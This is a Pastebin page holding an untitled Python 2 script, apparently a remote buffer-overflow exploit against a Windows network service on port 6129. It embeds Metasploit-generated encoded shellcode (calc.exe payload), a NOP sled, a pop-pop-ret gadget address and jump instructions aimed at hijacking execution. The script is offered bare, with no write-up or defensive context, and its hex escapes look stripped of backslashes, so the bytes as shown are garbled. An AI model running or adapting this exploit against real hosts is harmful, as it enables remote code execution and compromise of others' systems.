API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Nov 19th, 2017
67
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.13 KB | None | 0 0
raw download clone embed print report
  1. import socket
  2. import sys
  3. import os
  4. import time
  5. import struct
  6. import binascii
  7. import random
  8.  
  9. # windows/exec - 220 bytes
  10. # http://www.metasploit.com
  11. # Encoder: x86/shikata_ga_nai
  12. # VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
  13. # CMD=calc.exe
  14. sc = ""
  15. sc += "xbax01xa8x4fx9exd9xcaxd9x74x24xf4x5ex29"
  16. sc += "xc9xb1x31x31x56x13x03x56x13x83xeexfdx4a"
  17. sc += "xbax62x15x08x45x9bxe5x6dxcfx7exd4xadxab"
  18. sc += "x0bx46x1exbfx5ex6axd5xedx4axf9x9bx39x7c"
  19. sc += "x4ax11x1cxb3x4bx0ax5cxd2xcfx51xb1x34xee"
  20. sc += "x99xc4x35x37xc7x25x67xe0x83x98x98x85xde"
  21. sc += "x20x12xd5xcfx20xc7xadxeex01x56xa6xa8x81"
  22. sc += "x58x6bxc1x8bx42x68xecx42xf8x5ax9ax54x28"
  23. sc += "x93x63xfax15x1cx96x02x51x9ax49x71xabxd9"
  24. sc += "xf4x82x68xa0x22x06x6bx02xa0xb0x57xb3x65"
  25. sc += "x26x13xbfxc2x2cx7bxa3xd5xe1xf7xdfx5ex04"
  26. sc += "xd8x56x24x23xfcx33xfex4axa5x99x51x72xb5"
  27. sc += "x42x0dxd6xbdx6ex5ax6bx9cxe4x9dxf9x9ax4a"
  28. sc += "x9dx01xa5xfaxf6x30x2ex95x81xccxe5xd2x7e"
  29. sc += "x87xa4x72x17x4ex3dxc7x7ax71xebx0bx83xf2"
  30. sc += "x1exf3x70xeax6axf6x3dxacx87x8ax2ex59xa8"
  31. sc += "x39x4ex48xcbxdcxdcx10x22x7bx65xb2x3a"
  32.  
  33. port = 6129
  34.  
  35. if len (sys.argv) == 2:
  36. (progname, host ) = sys.argv
  37. else:
  38. print len (sys.argv)
  39. print 'Usage: {0} host'.format (sys.argv[0])
  40. exit (1)
  41.  
  42. csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
  43. csock.connect ( (host, int(port)) )
  44.  
  45. type = 444.0
  46. buf = struct.pack("I", 4400 ) #Init Version
  47. buf += "xcc"*4
  48. buf += struct.pack("d", type) #Minor Version
  49. buf += struct.pack("d", type) #Minor Version
  50. buf += (40 - len(buf)) * "C"
  51. csock.send(buf)
  52.  
  53. wstr = "x90" * 0x10 #nop sled
  54. wstr += sc #calc shellcode
  55. wstr += "x90" * (0x2ac - 0x10 - len(sc))
  56. wstr += "xebx06xffxff" #short jump forward
  57. wstr += struct.pack("I", 0x00401161 ) #pop pop return gadget
  58. wstr += "x90" * 3 #nop
  59. wstr += "xe9x6bxfaxffxff" #short jump back to shellcode
  60. wstr += "E" * 0xbc
  61. wstr += ("%" + "x00" + "c" + "x00")*5
  62.  
  63. buf = struct.pack("I", 0x9c44) #msg type
  64. buf += wstr #payload
  65. buf += "x00" * (0x200) #null bytes
  66. csock.send(buf)
  67.  
  68. print binascii.hexlify(csock.recv(0x4000)) #necessary reads
  69. print binascii.hexlify(csock.recv(0x4000))
  70.  
  71. csock.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!